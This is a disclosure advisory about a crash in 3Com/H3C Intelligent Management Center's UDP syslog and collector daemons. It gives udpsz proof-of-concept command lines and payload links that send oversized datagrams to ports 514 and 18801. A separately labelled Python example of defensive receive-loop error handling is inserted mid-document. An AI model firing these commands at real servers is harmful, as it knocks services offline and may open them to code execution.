#######################################################################

                             Luigi Auriemma

Application:  3com / H3C Intelligent Management Center (IMC)
              http://www.3com.com/IMC_Enterprise/
Versions:     <= 3.3 SP2 R2606P13
Platforms:    Windows, Linux, Solaris
Bug:          unknown problem in ACE_OS::exit
Exploitation: remote, versus server
Date:         probably found 19 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"3Com® Intelligent Management Center (IMC) Enterprise Edition is a
self-contained comprehensive management solution, flexible and scalable
enough to meet the needs of advanced Enterprise networks."

The suite is also known under the vendors HP and H3C (the original
developer).

#######################################################################

======
2) Bug
======

imcsyslogdm.exe is a syslog daemon listening on UDP ports 514 and 515,
while receiver.exe and processor.exe listen on UDP ports 18801 and
18802. None of these components is deployed by default in IMC.

The problem is in how the services react to the socket errors (-1
returned by recvfrom) caused by packets bigger than 2048 bytes. They
try to exit by calling ACE_OS::exit, but after a NULL pointer
dereference (EAX+14) the code flow moves into zones of the heap memory
where parts of the data received in the previous packets are also
sprayed.

I don't have additional details, so I can't confirm the code execution,
which could be not so trivial.

The problem happens also with receiver.exe and processor.exe, but they
seem less exploitable.
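A receive loop of the kind the affected daemons lack, as an added example (not the advisory's or the vendor's code): a recvfrom failure on an oversized datagram is classified and the datagram dropped instead of entering an exit path. The 2048-byte buffer follows the advisory; the function names and the constructed loopback traffic are assumptions.

```python
import errno
import socket
from collections import Counter

BUFSIZE = 2048                                      # buffer size the affected daemons use
WSAEMSGSIZE = getattr(errno, "WSAEMSGSIZE", 10040)  # Windows: datagram larger than buffer
TRANSIENT = {errno.EINTR, errno.EAGAIN, errno.EWOULDBLOCK, errno.ECONNRESET}

def receive_datagram(sock, bufsize=BUFSIZE):
    """Read one datagram and classify the outcome instead of exiting on error.

    Returns (status, data, addr) with status 'ok', 'oversize' or 'transient'.
    On Windows recvfrom fails with WSAEMSGSIZE (the -1 return the advisory
    describes) when the datagram exceeds bufsize; on Linux/Solaris the kernel
    silently truncates it, which the len(data) >= bufsize check flags.
    """
    try:
        data, addr = sock.recvfrom(bufsize)
    except OSError as exc:
        if exc.errno in (errno.EMSGSIZE, WSAEMSGSIZE):
            return ("oversize", None, None)         # drop the datagram, keep serving
        if exc.errno in TRANSIENT:
            return ("transient", None, None)        # retry on the next iteration
        raise                                       # unrecoverable socket state
    if len(data) >= bufsize:
        return ("oversize", data, addr)             # possibly truncated: never parse it
    return ("ok", data, addr)

def serve(sock, handler, max_datagrams):
    """Process up to max_datagrams datagrams; oversize/transient are counted, not fatal."""
    stats = Counter()
    for _ in range(max_datagrams):
        status, data, addr = receive_datagram(sock)
        stats[status] += 1
        if status == "ok":
            handler(data, addr)
    return stats

if __name__ == "__main__":
    # Loopback demo with constructed traffic: a normal syslog line, then a
    # 2049-byte datagram like the one the PoC sends, then a normal line again.
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))
    cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for payload in (b"<13>Oct 19 12:00:00 host app: hello", b"A" * 2049, b"<13>bye"):
        cli.sendto(payload, srv.getsockname())
    print(serve(srv, lambda d, a: print("syslog from %s:%d: %r" % (a[0], a[1], d)), 3))
```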
#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/imc_8.dat

  udpsz -f imc_8.dat -l 10 SERVER 514 -1

after 10 seconds stop it and use:

  udpsz SERVER 514 2049

while for testing receiver.exe or processor.exe:

  udpsz -l 10 -X 0x16 8 l 0 -H md5 4 0 0 silhouette -C "000ad8a7 00000000000000000000000000000000 ffff 32 04 01 01" SERVER 18801 0x1400

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-166

#######################################################################